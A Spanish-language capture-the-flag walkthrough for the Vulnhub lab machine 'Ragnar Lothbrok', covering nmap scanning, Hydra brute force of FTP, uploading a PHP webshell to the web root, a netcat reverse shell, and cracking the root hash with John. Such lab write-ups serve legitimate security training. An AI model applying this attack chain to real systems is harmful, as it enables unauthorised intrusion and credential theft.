Hoy vamos a hackear la maquina de Vulnhub llamada
Ragnar Lothbrok. Podeis descargarla desde el siguiente enlace:
Ragnar Lothbrok
Video
Enumeration
Empezamos con un nmap para ver que puertos
tiene abiertos.
> nmap -A -p- 192.168.1.137
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-09 13:07 CET
Nmap scan report for armbjorn (192.168.1.137)
Host is up (0.00087s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
80/tcp open http Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1h PHP/7.2.34
mod_perl/2.0.11 Perl/v5.32.0)
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1h PHP/7.2.34
mod_perl/2.0.11 Perl/v5.32.0
| http-title: Welcome to XAMPP
|_Requested resource was http://armbjorn/dashboard/
443/tcp open ssl/http Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1h PHP/7.2.34
mod_perl/2.0.11 Perl/v5.32.0)
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1h PHP/7.2.34
mod_perl/2.0.11 Perl/v5.32.0
| http-title: Welcome to XAMPP
|_Requested resource was https://armbjorn/dashboard/
| ssl-cert: Subject: commonName=localhost/organizationName=Apache
Friends/stateOrProvinceName=Berlin/countryName=DE
| Not valid before: 2004-10-01T09:10:30
|_Not valid after: 2010-09-30T09:10:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
3306/tcp open mysql?
| fingerprint-strings:
| NULL:
|_ Host 'aVa.home' is not allowed to connect to this MariaDB server
1 service unrecognized despite returning data. If you know the service/version,
please submit the following fingerprint at
https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.70%I=7%D=12/9%Time=5FD0BDF1%P=x86_64-pc-linux-gnu%r(NU
SF:LL,47,"C\0\0\x01\xffj\x04Host\x20'aVa\.home'\x20is\x20not\x20allowed\x2
SF:0to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.67 seconds
De todos los puertos que tiene abiertos, empezamos examinando mas
en detalle el servidor web a ver si encontramos algun fichero interesante.
Vemos que esta el directorio /wordpress, al visitarlo vemos
que hay un usuario llamado ragnar.
Por otro lado, vemos que hay un directorio llamado /secret.
Tras visitarlo, tiene pinta de ser una posible lista de passwords.
Nos la descargamos :)
> wget http://armbjorn/secret -O lista.txt
Sabiendo que existe un usuario llamado ragnar, haremos brutefoce
al FTP usando como diccionario el encontrado en /secret y como
usuario "ragnar".
> hydra -l ragnar -P lista.txt 192.168.1.137 ftp
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret
service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-09
13:07:27
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip
waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4617 login tries
(l:1/p:4617), ~289 tries per task
[DATA] attacking ftp://192.168.1.137:21/
[STATUS] 1797.00 tries/min, 1797 tries in 00:01h, 2824 to do in 00:02h, 16
active
[STATUS] 2071.00 tries/min, 4142 tries in 00:02h, 479 to do in 00:01h, 16 active
[21][ftp] host: 192.168.1.137 login: ragnar password: lagertha
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-09
13:09:49
Conseguimos el password!
Nos logueamos en el FTP.
> ftp 192.168.1.137
Connected to 192.168.1.137.
220 ProFTPD Server (ProFTPD) [::ffff:192.168.1.137]
Name (192.168.1.137:sml): ragnar
331 Password required for ragnar
Password:
230 User ragnar logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxr-x 1 33 33 3607 Aug 27 2019 applications.html
-rwxrwxr-x 1 33 33 177 Aug 27 2019 bitnami.css
drwxrwxr-x 21 33 33 4096 Dec 3 18:16 dashboard
-rwxrwxr-x 1 33 33 30894 May 11 2007 favicon.ico
drwxrwxr-x 2 33 33 4096 Dec 3 18:16 img
-rwxrwxr-x 1 33 33 260 Jul 9 2015 index.php
-rw-rw-r-- 1 33 33 40578 Dec 3 19:00 secret
drwxrwxr-x 2 33 33 4096 Dec 3 18:14 webalizer
drwxrwxrwx 5 33 33 4096 Dec 9 12:02 wordpress
226 Transfer complete
ftp>
Por la estructura del directorio y las carpetas que hay, se puede
intuir que es la raiz del webserver...
Asi que preparamos una webshell:
ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful
150 Opening BINARY mode data connection for shell.php
226 Transfer complete
5496 bytes sent in 0.00 secs (124.7951 MB/s)
Una vez subida la webshell, ponemos nc a la escucha.
> nc -nlvp 1234
listening on [any] 1234 ...
Y visitamos http://armbjorn/shell.php.
Low shell
> nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.1.105] from (UNKNOWN) [192.168.1.137] 58860
Linux osboxes 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020
x86_64 x86_64 x86_64 GNU/Linux
07:11:36 up 17 min, 0 users, load average: 4.95, 5.40, 3.08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
Ya dentro del sistema, nos logueamos como ragnar con
la password obtenida anteriormente.
daemon@osboxes:/$ su ragnar
Password: lagertha
Vemos que hay un fichero llamado secret.
Vemos que contiene.
Parece la pass de root :)
La copiamos en nuestro sistema, y probamos a crackearla con john.
> john --wordlist=/usr/share/wordlists/rockyou.txt ~/tocrack2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
kevinmitnick (root)
1g 0:00:05:31 DONE (2020-12-09 13:31) 0.003013g/s 2703p/s 2703c/s 2703C/s
keya18..kete12
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Tras crackear la password, nos logueamos como root!
Privilege Escalation
ragnar@osboxes:~$ su root
Password: kevinmitnick
root.txt
root@osboxes:/home/ragnar# cd /root
root@osboxes:~# ls -la
total 56
drwx------ 8 root root 4096 Dec 4 06:43 .
drwxr-xr-x 19 root root 4096 Jul 31 12:34 ..
-rw------- 1 root root 273 Dec 4 06:43 .bash_history
-rw-r--r-- 1 root root 0 Dec 3 14:51 .bashrc
drwx------ 5 root root 4096 Dec 3 14:24 .cache
drwxr-xr-x 5 root root 4096 Dec 3 13:52 .config
drwx------ 3 root root 4096 Dec 3 13:52 .dbus
drwxr-xr-x 2 root root 4096 Dec 3 15:33 Desktop
drwx------ 3 root root 4096 Dec 3 15:33 .gnupg
-rw-r--r-- 1 root root 129 Dec 3 14:22 hello
drwxr-xr-x 3 root root 4096 Dec 3 11:16 .local
-rw------- 1 root root 18 Dec 3 13:02 .mysql_history
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw------- 1 root root 5 Dec 3 14:47 .python_history
-rw-r--r-- 1 root root 66 Dec 3 12:36 .selected_editor
root@osboxes:~# cat hello
Congratulation Have a nice day
I'm very happy
How the little piglets would grunt if they knew how the old boar suffered